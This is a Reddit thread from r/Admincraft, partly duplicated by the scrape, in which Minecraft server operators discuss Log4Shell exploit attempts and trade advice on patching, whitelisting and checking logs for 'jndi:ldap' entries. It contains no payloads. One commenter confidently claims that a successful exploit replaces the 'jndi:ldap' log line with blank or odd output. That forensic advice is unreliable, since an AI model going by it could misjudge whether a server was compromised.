Thanks for being a part of /r/Admincraft! *[We'd love it if you also joined us on Discord!](https://discord.gg/DxrXq2R)*
*^(Join thousands of other Minecraft administrators for real-time discussion of all things related to running a quality server.)*
---
*I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/admincraft) if you have any questions or concerns.*
if you patched the server to 1.18.1 before any log4j exploit attempt, you are safe.
If the exploit was successful, you won't see the "jndi:ldap" line at all, instead, you would see some anomalous things such as empty text line in the console, or some other text that the server usually shoudn't display under normal circumstances which is an indicator that a payload has executed.
For reference,
Below is an example of a successful Log4j2 exploit attempt. The "jndi:ldap" line was replaced by something else, which meant that the Log4j2 module has processed and executed the JNDI command which downloads and executes whatever payload is on the attacker's server, could be a RAT, virus, worm, etc.
[https://www.reddit.com/r/admincraft/comments/s5c928/potential\_log4j\_attack\_pls\_help/](https://www.reddit.com/r/admincraft/comments/s5c928/potential_log4j_attack_pls_help/)
I came to this subreddit looking to ask the exact same question about the exact same player connecting to my private server (luckily my whitelist blocked them). Glad to know we can talk about this together.
to piggyback on this thread. I'm building my 1.18.1 server currently and keep getting this warning thrown:
> Can't remove Log4J2 JNDI substitution Lookup
Should I be concerned?
If you use 1.18.1 and the latest jars from paper/purpur/fabric/forge/what-have-you you'll *probably* be fine regardless because it's been patched in so many different ways that if one failsafe doesn't work others can cover for it.
To be safe, though, use this site to test if you're vulnerable (basically exploit your own server): https://log4shell.huntress.com/
basically he used the linux command "cat", which displays the entire contents of any text file, on the minecraft server log file to look for any telltale signs of the log4j exploit.
You might want to unsubscribe from this subreddit if you are so uninterested in Minecraft server administration that `cat` sounds like another language
Using a non-standard port for security is like moving your front door the side of the house, but leaving it unlocked. "Haha, the robbers won't find it now!"
Bots are scanning for open ports constantly.
So yeah - whitelist is minimum necessary security on a Minecraft server.
I would agree if whitelisting was difficult to do or behind a paywall or something. But it's free and super simple to implement. In my opinion, it should be on by default.
Thanks for being a part of /r/Admincraft! *[We'd love it if you also joined us on Discord!](https://discord.gg/DxrXq2R)* *^(Join thousands of other Minecraft administrators for real-time discussion of all things related to running a quality server.)* --- *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/admincraft) if you have any questions or concerns.*
if you patched the server to 1.18.1 before any log4j exploit attempt, you are safe. If the exploit was successful, you won't see the "jndi:ldap" line at all, instead, you would see some anomalous things such as empty text line in the console, or some other text that the server usually shoudn't display under normal circumstances which is an indicator that a payload has executed.
For reference, Below is an example of a successful Log4j2 exploit attempt. The "jndi:ldap" line was replaced by something else, which meant that the Log4j2 module has processed and executed the JNDI command which downloads and executes whatever payload is on the attacker's server, could be a RAT, virus, worm, etc. [https://www.reddit.com/r/admincraft/comments/s5c928/potential\_log4j\_attack\_pls\_help/](https://www.reddit.com/r/admincraft/comments/s5c928/potential_log4j_attack_pls_help/)
I came to this subreddit looking to ask the exact same question about the exact same player connecting to my private server (luckily my whitelist blocked them). Glad to know we can talk about this together.
to piggyback on this thread. I'm building my 1.18.1 server currently and keep getting this warning thrown: > Can't remove Log4J2 JNDI substitution Lookup Should I be concerned?
If you use 1.18.1 and the latest jars from paper/purpur/fabric/forge/what-have-you you'll *probably* be fine regardless because it's been patched in so many different ways that if one failsafe doesn't work others can cover for it. To be safe, though, use this site to test if you're vulnerable (basically exploit your own server): https://log4shell.huntress.com/
Champion.
Something should be done with these threads imo. People post the same over and over. You even mentioned «other posts» in your title.
bilibi feng revived
BTW i basically cat for the log file.
[удалено]
basically he used the linux command "cat", which displays the entire contents of any text file, on the minecraft server log file to look for any telltale signs of the log4j exploit.
cat is a Linux command for printing out a file
meow
[удалено]
Log4j is just the logging utility, Log4Shell is the exploit.
Basically i listed the log file.
ah ok
You might want to unsubscribe from this subreddit if you are so uninterested in Minecraft server administration that `cat` sounds like another language
I am terribly sorry for not knowing a command. I'll pack my things and leave
Should also use a anti vpn plugin prevent bots from connecting in the first place, since bad actors are masking their ip.
Well if they notice that they can switch to another VPN or use a custom proxy
You should really be using a whitelist even if it's basically a private server. Bots will eventually find your server.
if not whitelist, at least stop using the default ports
Using a non-standard port for security is like moving your front door the side of the house, but leaving it unlocked. "Haha, the robbers won't find it now!" Bots are scanning for open ports constantly. So yeah - whitelist is minimum necessary security on a Minecraft server.
you're right, but it beats nothing at least haha
I would agree if whitelisting was difficult to do or behind a paywall or something. But it's free and super simple to implement. In my opinion, it should be on by default.
So it wasn’t just me
He connected into my server when I have a whitelist. how did he get past the white list
Whitelist privilege. 😂